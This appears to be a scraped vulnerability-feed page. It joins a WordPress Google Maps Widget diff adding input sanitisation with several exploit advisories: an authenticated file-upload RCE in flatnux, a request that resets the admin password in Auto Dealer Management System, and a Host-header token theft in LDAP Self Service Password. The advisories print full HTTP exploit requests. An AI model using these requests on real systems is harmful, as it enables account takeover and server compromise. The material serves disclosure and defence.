    $instance\['thumb\_height'\] = min(640, max(50, (int) $new\_instance\['thumb\_height'\]));

466

 

    $instance\['thumb\_zoom'\] = $new\_instance\['thumb\_zoom'\];

467

 

    $instance\['thumb\_type'\] = @$new\_instance\['thumb\_type'\];

468

 

    $instance\['thumb\_link\_type'\] = $new\_instance\['thumb\_link\_type'\];

469

 

    $instance\['thumb\_link'\] = trim($new\_instance\['thumb\_link'\]);

470

 

    $instance\['thumb\_header'\] = trim($new\_instance\['thumb\_header'\]);

471

 

    $instance\['thumb\_footer'\] = trim($new\_instance\['thumb\_footer'\]);

472

 

    $instance\['thumb\_color\_scheme'\] = $new\_instance\['thumb\_color\_scheme'\];

473

 

    $instance\['thumb\_format'\] = $new\_instance\['thumb\_format'\];

474

 

    $instance\['thumb\_lang'\] = $new\_instance\['thumb\_lang'\];

475

 

    $instance\['thumb\_powered\_by'\] = $new\_instance\['thumb\_powered\_by'\];

476

 

    $instance\['thumb\_hide\_title'\] = $new\_instance\['thumb\_hide\_title'\];

 

466

    $instance\['thumb\_zoom'\] = sanitize\_text\_field($new\_instance\['thumb\_zoom'\]);

 

467

    $instance\['thumb\_type'\] = sanitize\_text\_field(@$new\_instance\['thumb\_type'\]);

 

468

    $instance\['thumb\_link\_type'\] = sanitize\_text\_field($new\_instance\['thumb\_link\_type'\]);

 

469

    $instance\['thumb\_link'\] = sanitize\_text\_field(trim($new\_instance\['thumb\_link'\]));

 

470

    $instance\['thumb\_header'\] = wp\_kses\_post(trim($new\_instance\['thumb\_header'\]));

 

471

    $instance\['thumb\_footer'\] = wp\_kses\_post(trim($new\_instance\['thumb\_footer'\]));

 

472

    $instance\['thumb\_color\_scheme'\] = sanitize\_text\_field($new\_instance\['thumb\_color\_scheme'\]);

 

473

    $instance\['thumb\_format'\] = sanitize\_text\_field($new\_instance\['thumb\_format'\]);

 

474

    $instance\['thumb\_lang'\] = sanitize\_text\_field($new\_instance\['thumb\_lang'\]);

 

475

    $instance\['thumb\_powered\_by'\] = sanitize\_text\_field($new\_instance\['thumb\_powered\_by'\]);

 

476

    $instance\['thumb\_hide\_title'\] = sanitize\_text\_field($new\_instance\['thumb\_hide\_title'\]);

477

477

478

478

    $instance\['lightbox\_fullscreen'\] = (int) $new\_instance\['lightbox\_fullscreen'\];

479

479

    $instance\['lightbox\_width'\] = min(2000, max(50, (int) $new\_instance\['lightbox\_width'\]));

480

480

    $instance\['lightbox\_height'\] = min(2000, max(50, (int) $new\_instance\['lightbox\_height'\]));

481

 

    $instance\['lightbox\_mode'\] = $new\_instance\['lightbox\_mode'\];

482

 

    $instance\['lightbox\_map\_type'\] = $new\_instance\['lightbox\_map\_type'\];

483

 

    $instance\['lightbox\_zoom'\] = $new\_instance\['lightbox\_zoom'\];

 

481

    $instance\['lightbox\_mode'\] = sanitize\_text\_field($new\_instance\['lightbox\_mode'\]);

 

482

    $instance\['lightbox\_map\_type'\] = sanitize\_text\_field($new\_instance\['lightbox\_map\_type'\]);

 

483

    $instance\['lightbox\_zoom'\] = sanitize\_text\_field($new\_instance\['lightbox\_zoom'\]);

484

484

    $instance\['lightbox\_feature'\] = (array) $new\_instance\['lightbox\_feature'\];

485

 

    $instance\['lightbox\_header'\] = trim($new\_instance\['lightbox\_header'\]);

486

 

    $instance\['lightbox\_footer'\] = trim($new\_instance\['lightbox\_footer'\]);

487

 

    $instance\['lightbox\_skin'\] = $new\_instance\['lightbox\_skin'\];

488

 

    $instance\['lightbox\_lang'\] = $new\_instance\['lightbox\_lang'\];

 

485

    $instance\['lightbox\_header'\] = wp\_kses\_post(trim($new\_instance\['lightbox\_header'\]));

 

486

    $instance\['lightbox\_footer'\] = wp\_kses\_post(trim($new\_instance\['lightbox\_footer'\]));

 

487

    $instance\['lightbox\_skin'\] = sanitize\_text\_field($new\_instance\['lightbox\_skin'\]);

 

488

    $instance\['lightbox\_lang'\] = sanitize\_text\_field($new\_instance\['lightbox\_lang'\]);

489

489

490

490

    $instance\['core\_ver'\] = GMW::$version;

**google-maps-widget/trunk/google-maps-widget.php**

r2876127

r2893821

 

5

5

Description: Display a single image super-fast loading Google Map in a widget. A larger, full featured map is available in a lightbox. Includes a user-friendly interface and numerous appearance options.

6

6

Author: WebFactory Ltd

7

 

Version: 4.24

 

7

Version: 4.25

8

8

Author URI: https://www.gmapswidget.com/

9

9

Text Domain: google-maps-widget

…

…

 

11

11

Requires at least: 4.0

12

12

Requires PHP: 5.2

13

 

Tested up to: 6.1

 

13

Tested up to: 6.2

14

14

15

15

  Copyright 2012 - 2023  WebFactory Ltd  (email : gmw@webfactoryltd.com)

**google-maps-widget/trunk/readme.txt**

r2876127

r2893821

 

5

5

License URI: http://www.gnu.org/licenses/gpl-2.0.html

6

6

Requires at least: 4.0

7

 

Tested up to: 6.1

8

 

Stable tag: 4.24

 

7

Tested up to: 6.2

 

8

Stable tag: 4.25

9

9

Requires PHP: 5.2

10

10

…

…

 

181

181

182

182

\== Changelog ==

 

183

\= 4.25 =

 

184

\* 2023/04/04

 

185

\* JavaScript is no longer accepted in the widget footer and header fields

183

186

184

187

\= 4.24 =

185

188

\* 2023/03/07

186

 

\* minor security fixe

 

189

\* minor security fixes

187

190

188

191

\= 4.23 =

CVE-2023-1913: Diff [2876127:2893821] for google-maps-widget/trunk – WordPress Plugin Repository

Unified Remote version 3.13.0 suffers from a remote code execution vulnerability.

Unified Remote 3.13.0 Remote Code Execution

flatnux version 2021-03.25 suffers from a remote code execution vulnerability.

    # Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)# Exploit Author: Ömer Hasan Durmuş# Vendor Homepage: https://en.altervista.org# Software Link: http://flatnux.altervista.org/flatnux.html# Version: 2021-03.25# Tested on: Windows/LinuxPOST/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=enHTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data;boundary=---------------------------393526031113460918603940283286Content-Length: 413Origin: http://localhostConnection: closeReferer:http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnewCookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsbUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream<?php phpinfo(); ?>-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="ckCsrfToken"BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb-----------------------------393526031113460918603940283286--

flatnux 2021-03.25 Remote Code Execution

Auto Dealer Management System version 1.0 suffers from a broken access control vulnerability

# Exploit Title: Auto Dealer Management System 1.0 - Broken Access Control Exploit

It leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account

### Date:   
> 18 February 2023

### CVE Assigned: **[CVE-2023-0916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0916)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0916) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0916)

### Author:   
> Muhammad Navaid Zafar Ansari  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

# Tested On: Windows 11 

### Affected Page:  
> list.php , manage_user.php

> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.

### Description:  
> Broken access control allows low privilege attacker to change password of all application users

### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: ?page=user/list  
2. Click on Action and Edit the password of Admin

![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)

4. Update the Password and Submit

5. Request:  
```  
POST /adms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 877  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/adms/admin/?page=user/manage_user&id=1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5  
Connection: close

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="id"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="firstname"

Adminstrator  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="lastname"

Admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="username"

admin  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="password"

admin123  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryfODLB5j55MvB5pGU  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryfODLB5j55MvB5pGU--

```  
6. Successful exploit screenshots are below (without cookie parameter)  
![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)

7. Vulnerable Code Snippets:

![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)

![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  list.php , manage_user.php pages as per requirement to avoid a Broken Access Control attack

Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Auto Dealer Management System 1.0 Broken Access Control

LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.

    # Exploit Title:  LDAP Tool Box Self Service Password v1.5.2 -  Account takeover# Date: 02/17/2023# Exploit Author: Tahar BENNACEF (aka tar.gz)# Software Link: https://github.com/ltb-project/self-service-password# Version: 1.5.2# Tested on: UbuntuSelf Service Password is a PHP application that allows users to changetheir password in an LDAP directory.It is very useful to get back an account with waiting an action from anadministration especially in Active Directory environmentThe password reset feature is prone to an HTTP Host header vulnerabilityallowing an attacker to tamper the password-reset mail sent to his victimallowing him to potentially steal his victim's valid reset token. Theattacker can then use it to perform account takeover*Step to reproduce*1. Request a password reset request targeting your victim and setting inthe request HTTP Host header the value of a server under your controlPOST /?action=sendtoken HTTP/1.1Host: *111.111.111.111*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 16Origin: https://portal-lab.ngp.infraReferer: https://portal-lab.ngp.infra/?action=sendtokenUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closelogin=test.resetAs the vulnerable web application's relying on the Host header of thepassword-reset request to craft the password-reset mail. The victimreceive a mail with a tampered link[image: image.png]2. Start a webserver and wait for the victim to click on the linkIf the victim click on this tampered link, he will sent his password resettoken to the server set in the password-reset request's HTTP Host header[image: image.png]3. Use the stolen token to reset victim's account passwordBest regards

Tag

#php